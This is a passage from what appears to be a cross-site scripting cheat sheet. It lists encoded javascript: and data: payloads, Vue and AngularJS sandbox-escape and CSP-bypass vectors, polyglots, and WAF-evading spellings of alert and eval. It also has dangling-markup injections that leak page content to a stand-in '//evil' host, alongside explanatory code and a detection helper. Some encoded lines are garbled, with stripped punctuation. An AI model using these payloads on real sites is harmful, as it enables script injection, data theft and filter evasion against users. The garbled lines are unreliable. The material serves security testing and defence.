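function javascriptUrlBody(rawAttribute) {
  const cleaned = cleanUrl(decodeHtmlEntities(rawAttribute));
  if (effectiveScheme(cleaned) !== "javascript") return null;
  const body = cleaned.slice(cleaned.indexOf(":") + 1);
  try {
    return decodeURIComponent(body);
  } catch (e) {
    return body;
  }
}

// Constructed sample: every form below is the same javascript: URL to the browser.
const SAMPLES = [
  "javascript:alert(1)",
  "  JaVaScript:alert(1)",
  "&#106;avascript:alert(1)",
  "&#0000106avascript:alert(1)",
  "&#X6A;avascript:alert(1)",
  "java&Tab;script:alert(1)",
  "javascript&colon;alert&lpar;1&rpar;",
];
console.log(SAMPLES.map((s) => [s, isJavascriptUrl(s), javascriptUrlBody(s)]));
```

A filter that pattern-matches on the literal string "javascript:" catches only the first sample; running the check on the decoded, normalised value catches all of them. The same pipeline is what a WAF or log-analysis rule has to apply before a string comparison is meaningful.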

Obfuscation

Data protocol inside script src with base64: <script src="data:text/javascript;base64,YWxlcnQoMSk="></script>

Data protocol inside script src with base64 and HTML entities
<script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>

Data protocol inside script src with base64 and URL encoding
<script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>

Iframe srcdoc HTML encoded: <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt

SVG script with unicode escapes and HTMLencoding

ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt

Client-side template injection

VueJS reflected

Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | {}.")));alert(1)//"
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
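Several of the 1.3.x to 1.5.x vectors in both tables start with 'a'.constructor.prototype.charAt=[].join and only then parse a second expression through $eval or orderBy. The following is an added example, my own toy model and not AngularJS code, of why that works. It assumes that the affected AngularJS versions lexed an identifier by scanning with String.prototype.charAt and slicing the scanned range, then compiled the member access with new Function; with charAt replaced by Array.prototype.join, every charAt(i) returns the whole expression joined by i, the identifier test accepts that, the scan runs to the end, and the entire expression is pasted verbatim into the generated getter. The pwned() sink and the scope object are constructed for the example.

```javascript
// Added example: a toy model (not AngularJS's own code) of how the
// 'a'.constructor.prototype.charAt=[].join vectors turn a property getter
// into code execution. Assumption: the affected AngularJS versions lexed
// identifiers by scanning with String.prototype.charAt and slicing the
// scanned range, then compiled the member access with new Function.

function isIdentChar(ch) {
  return ('a' <= ch && ch <= 'z') || ('A' <= ch && ch <= 'Z') ||
         ('0' <= ch && ch <= '9') || ch === '_' || ch === '$';
}

// Scan an identifier: advance while the character at `i` is an identifier
// character, then return the scanned slice. The slice is the weak spot: the
// result is whatever range the scan covered, not the characters it saw.
function readIdent(text, start) {
  let i = start;
  while (i < text.length && isIdentChar(text.charAt(i))) i++;
  return text.slice(start, i);
}

// Sandbox check in the style of ensureSafeMemberName: blocks a few names
// but does no syntactic validation of the identifier itself.
function ensureSafeMemberName(name) {
  if (/^(constructor|__proto__|__defineGetter__|__defineSetter__|__lookupGetter__|__lookupSetter__)$/.test(name)) {
    throw new Error('Referencing "' + name + '" in expressions is disallowed');
  }
}

// Compile a single-identifier expression to a getter over a scope object by
// generating source code, as a code-generating expression parser would.
function compileGetter(expr) {
  const ident = readIdent(expr, 0);
  if (ident !== expr) throw new SyntaxError('unsupported expression: ' + expr);
  ensureSafeMemberName(ident);
  return new Function('s', 'return s.' + ident + ';');
}

// Parse and run `expr` with String.prototype.charAt replaced the way the
// vectors do it, restoring charAt afterwards whatever happens.
function evalWithPollutedCharAt(expr, scope) {
  const original = String.prototype.charAt;
  String.prototype.charAt = [].join;   // 'a'.constructor.prototype.charAt=[].join
  try {
    return compileGetter(expr)(scope);
  } finally {
    String.prototype.charAt = original;
  }
}

function demoCharAtPollution() {
  const hits = [];
  globalThis.pwned = (v) => { hits.push(v); return v; };   // stands in for alert(1)
  const scope = { user: 'alice' };                           // constructed scope

  const normal = compileGetter('user')(scope);               // 'alice'
  let blocked = false;
  try { compileGetter('constructor'); } catch (e) { blocked = true; }
  let rejected = false;
  try { compileGetter('x=pwned(1)'); } catch (e) { rejected = true; } // '=' stops the scan

  // With charAt polluted, charAt(0) on 'x=pwned(1)' returns "x0=0p0w0n0e0d0(010)",
  // which the range test accepts, so the scan runs to the end and the
  // "identifier" handed to new Function is the whole expression.
  const polluted = evalWithPollutedCharAt('x=pwned(1)', scope);
  return { normal, blocked, rejected, polluted, hits };
}

console.log(JSON.stringify(demoCharAtPollution()));
```

The sandbox check is not bypassed by a clever name: it never sees one, because the lexer has already been tricked into classifying "x=pwned(1)" as a single identifier. That is also why the vectors need a second parse ($eval or a filter): the expression that performs the assignment has already been tokenised by the time it runs, so only expressions parsed afterwards are affected.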

AngularJS CSP bypasses

Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute:
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?

Link href stylesheet: <link rel=stylesheet href="//evil?

Link href icon: <link rel=icon href="//evil?

Meta refresh: <meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute:
<img src="//evil?
<image src="//evil?

Video using track element: <video><track default src="//evil?

Video using source element and src attribute: <video><source src="//evil?

Audio using source element and src attribute: <audio><source src="//evil?

Input src: <input type=image src="//evil?

Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action: <button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data: <object data="//evil?

Iframe src: <iframe src="//evil?

Embed src: <embed src="//evil?

Embed src (second form as extracted; the delimiter between src and //evil? was lost in this copy): <embed src //evil?

Use textarea to consume markup and post to external site: <form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target: <button form=x>XSS</button><form id=x action=//evil/ target="

Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?
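The dangling-markup vectors above all work the same way: an attribute value is opened and never closed, so the tokenizer swallows the rest of the page up to the next matching quote, and the browser sends that text to the attacker's host as part of a URL. The following is an added example, not from the cheat sheet, that models the capture and resolves the resulting URL with Node's WHATWG URL parser, so the effect of newlines, percent-encoding, an unquoted attribute and a '#' in the captured markup can be seen. The victim origin and the page fragments are constructed for the example.

```javascript
// Added example (not from the cheat sheet): model what a dangling-markup
// injection such as <img src="//evil? makes the browser request. The HTML
// tokenizer keeps reading the attribute value until the closing quote, so
// everything after the injection point up to the next quote of the same kind
// becomes part of the URL; the URL parser then strips tabs and newlines and
// percent-encodes the rest. Assumed victim page (constructed):
const VICTIM_PAGE = 'https://victim.example/account';

// What the tokenizer captures for the unterminated attribute that ends
// `injection`. A quoted value ends at the matching quote; an unquoted value
// ends at the first whitespace or '>'. Simplification: character references
// inside the captured text are not decoded here, and `injection` must end
// inside the attribute value.
function danglingCapture(injection, pageRest) {
  const quoted = /(["'])([^"']*)$/.exec(injection);
  if (quoted) {
    const end = pageRest.indexOf(quoted[1]);
    return { prefix: quoted[2], captured: end === -1 ? pageRest : pageRest.slice(0, end) };
  }
  const unquoted = /=([^\s=>]*)$/.exec(injection);
  if (!unquoted) throw new Error('injection does not end inside an attribute value');
  const end = pageRest.search(/[\s>]/);
  return { prefix: unquoted[1], captured: end === -1 ? pageRest : pageRest.slice(0, end) };
}

// The absolute URL the browser resolves and fetches. Node's URL parser does
// the tab/newline removal and the percent-encoding, like a browser would.
function exfilUrl(injection, pageRest) {
  const { prefix, captured } = danglingCapture(injection, pageRest);
  return new URL(prefix + captured, VICTIM_PAGE);
}

// Constructed page remainder: a secret in text, then a quoted attribute
// whose opening quote terminates the capture.
const PAGE_REST_TOKEN_FIRST =
  '\n<p>Your password reset code is 8f3a9c2d</p>\n<a href="/logout">Log out</a>';

// Same page, but a '#' precedes the secret, so it lands in the fragment.
const PAGE_REST_FRAGMENT =
  '\n<a name=top href=#top>Top</a> code 8f3a9c2d <a href="/logout">Log out</a>';

function demoDanglingMarkup() {
  const img = exfilUrl('<img src="//evil?', PAGE_REST_TOKEN_FIRST);     // quoted: reads to next "
  const embed = exfilUrl('<embed src=//evil?', PAGE_REST_TOKEN_FIRST);  // unquoted: stops at whitespace
  const frag = exfilUrl('<img src="//evil?', PAGE_REST_FRAGMENT);       // '#' cuts the query short
  return {
    imgHost: img.hostname,
    imgQuery: decodeURIComponent(img.search),
    embedQuery: decodeURIComponent(embed.search),
    fragQuery: decodeURIComponent(frag.search),
    fragFragment: frag.hash,
  };
}

console.log(JSON.stringify(demoDanglingMarkup(), null, 2));
```

Two of the outcomes are the caveats to remember when testing: an unquoted attribute captures nothing past the first whitespace, and a '#' anywhere in the captured markup moves everything after it into the fragment, which is never sent to the server. Both are why the quoted vectors and the width/height-filling button variants above exist.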

Polyglots

Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2: javascript:`//"/*\"/*'/*\'/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window, self, this, top, parent, frames, globalThis):
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, comment syntax (window, self, this, top, parent, frames, globalThis):
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, hex escape sequence (window, self, this, top, parent, frames, globalThis):
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window, self, this, top, parent, frames, globalThis; WFNT is base64 for XSS):
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence (window, self, this, top, parent, frames, globalThis):
window['\141\154\145\162\164']('\130\123\123')
self['\141\154\145\162\164']('\130\123\123')
this['\141\154\145\162\164']('\130\123\123')
top['\141\154\145\162\164']('\130\123\123')
parent['\141\154\145\162\164']('\130\123\123')
frames['\141\154\145\162\164']('\130\123\123')
globalThis['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape (window, self, this, top, parent, frames, globalThis):
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property (window, self, this, top, parent, frames, globalThis):
window[/al/.source+/ert/.source](/XSS/.source)
self[/al/.source+/ert/.source](/XSS/.source)
this[/al/.source+/ert/.source](/XSS/.source)
top[/al/.source+/ert/.source](/XSS/.source)
parent[/al/.source+/ert/.source](/XSS/.source)
frames[/al/.source+/ert/.source](/XSS/.source)
globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window, self, this, top, parent, frames, globalThis; the index builds "alert" from "NaN", "false", "undefined" and "true", and the argument is "1"):
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
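The seven families above reach the same alert(document.domain) (or eval/atob) call through different spellings of the property name, which is exactly what defeats a WAF that matches on the literal text alert. The following is an added example, not from the cheat sheet: it folds the bracket-index expression back to a plain string so that a detection rule can match on the resolved name, and it returns null for the one form it cannot fold (Hieroglyphy/JSFuck), which a rule should treat as suspicious rather than as safe. The SENSITIVE name list is an assumption for illustration.

```javascript
// Added example (not from the cheat sheet): fold the obfuscated member lookups
// from this section back to their plain names, so a rule can match on the
// resolved name ("alert", "eval", "document") instead of on raw text that a
// signature would miss. Handles string concatenation, /* */ comments, \x,
// octal and \u escapes, and RegExp .source. Anything else folds to null.

function stripBlockComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Decode the escapes JavaScript allows inside a string literal (body only, no quotes).
function decodeStringBody(body) {
  return body.replace(/\\(x[0-9A-Fa-f]{2}|u\{[0-9A-Fa-f]+\}|u[0-9A-Fa-f]{4}|[0-7]{1,3}|[\s\S])/g, (_, e) => {
    if (e[0] === 'x') return String.fromCharCode(parseInt(e.slice(1), 16));
    if (e[0] === 'u') return String.fromCodePoint(parseInt(e.replace(/[u{}]/g, ''), 16));
    if (/^[0-7]/.test(e)) return String.fromCharCode(parseInt(e, 8));
    return { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v' }[e] ?? e; // \' \" \\ and the rest
  });
}

// Fold an expression made of string literals and /regex/.source terms joined
// by '+'. Returns the resulting string, or null if any term is something else.
function foldStringExpr(s) {
  let i = 0, out = '';
  const skipWs = () => { while (i < s.length && /\s/.test(s[i])) i++; };
  // Read a delimited term starting at i+1 up to the unescaped `close` delimiter.
  const readDelimited = (close) => {
    let j = i + 1, body = '';
    while (j < s.length && s[j] !== close) {
      body += s[j] === '\\' ? s[j] + s[j + 1] : s[j];
      j += s[j] === '\\' ? 2 : 1;
    }
    return j < s.length ? { body, next: j + 1 } : null;
  };
  for (;;) {
    skipWs();
    if (i >= s.length) return null;                       // empty, or dangling '+'
    const q = s[i];
    if (q === '"' || q === "'") {                         // 'str' or "str"
      const t = readDelimited(q);
      if (!t) return null;
      out += decodeStringBody(t.body);
      i = t.next;
    } else if (q === '/') {                               // /pattern/.source
      const t = readDelimited('/');
      if (!t || !s.startsWith('.source', t.next)) return null;
      out += t.body;                                      // .source is the raw pattern text
      i = t.next + '.source'.length;
    } else {
      return null;                                        // identifier, number, call ...: not foldable
    }
    skipWs();
    if (i >= s.length) return out;
    if (s[i] !== '+') return null;
    i++;
  }
}

// Resolve the first `obj[...]` access in `code`: {object, member}, where
// member is null when the index expression cannot be folded.
function resolveBracketAccess(code) {
  const src = stripBlockComments(code);
  const m = /^\s*([A-Za-z_$][\w$]*)\s*\[/.exec(src);
  if (!m) return null;
  const start = m[0].length;
  let depth = 1, i = start;
  for (; i < src.length && depth > 0; i++) {
    if (src[i] === '[') depth++;
    else if (src[i] === ']') depth--;
  }
  if (depth !== 0) return null;
  return { object: m[1], member: foldStringExpr(src.slice(start, i - 1)) };
}

// Illustrative sink list (an assumption, not a complete one).
const SENSITIVE = new Set(['alert', 'eval', 'Function', 'document', 'location', 'fetch']);

// A lookup is suspicious when it resolves to a sensitive name, or cannot be
// resolved at all (JSFuck-style indexes never fold to a literal).
function isSuspiciousLookup(code) {
  const r = resolveBracketAccess(code);
  return r !== null && (r.member === null || SENSITIVE.has(r.member));
}
```

The function intentionally does not evaluate anything: each term is folded by rules that only produce strings, so running it over untrusted input is safe, which is not true of the obvious alternative of feeding the index expression to eval.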

Classic vectors (XSS crypt)

Image src with JavaScript protocol: <img src="javascript:alert(1)">

Body background with JavaScript protocol: <body background="javascript:alert(1)">

Iframe data URLs no longer work, because modern browsers give the framed document a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

Impossible labs

Title | Description | Length limit | Closest vector | Link

Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag. | N/A | N/A | (link)
Script based injection but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script-based context and the second in HTML. | N/A | N/A | (link)
innerHTML context but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals, then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A | (link)
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q/oncut=alert`` but can you beat it? | 15 | <q oncut=alert`` | (link)
Attribute context, length limit | The context of this lab is inside an attribute, with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert`` (followed by a space) | (link)
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name) | (link)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute-based injection with arbitrary JavaScript. | 17 | See link | (link)
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A | (link)
Injection occurs inside single quoted string, only characters a-z0-9+` are allowed | The injection occurs within a single quoted string, and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A | (link)

Classic vectors (XSS crypt), continued

VBScript protocol, used to work in IE:
<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE:
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>

JScript.Encode allows encoded JavaScript:
<a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encode allows encoded VBScript:
<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
